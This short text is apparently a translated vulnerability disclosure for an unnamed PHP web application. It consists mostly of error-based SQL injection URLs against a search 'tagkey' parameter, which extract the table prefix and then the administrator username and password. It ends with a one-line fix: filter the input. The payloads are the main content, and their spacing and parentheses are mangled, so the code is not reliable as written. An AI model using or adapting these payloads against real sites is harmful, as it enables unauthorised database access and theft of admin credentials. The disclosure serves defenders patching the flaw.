Injection Point (explosive table prefix): index. php? Ac = search & at = taglist & tagkey = % 2527, tags) or (select 1 from (select count (*), concat (select concat (0x7e, 0x27, table_name, 0x27, 0x7e) from information_schema.tables where table_schema = database () limit 0, 1), floor (rand (0) * 2 )) x from information_schema.tables group by x) a) % 23
Burst User Name:
Www.2cto.com index. php? Ac = search & at = taglist & tagkey = % 2527, tags) or (select 1 from (select count (*), concat (select concat (0x7e, 0x27, username, 0x27, 0x7e) from prefix _ admin_member limit 0, 1), floor (rand (0) * 2) x from information_schema.tables group by x)) % 23)
Password explosion: index. php? Ac = search & at = taglist & tagkey = % 2527, tags) or (select 1 from (select count (*), concat (select concat (0x7e, 0x27, password, 0x27, 0x7e) from prefix _ admin_member limit 0, 1), floor (rand (0) * 2) x from information_schema.tables group by x)) % 23
Fixed: filter the corresponding parameter input on the index. php page.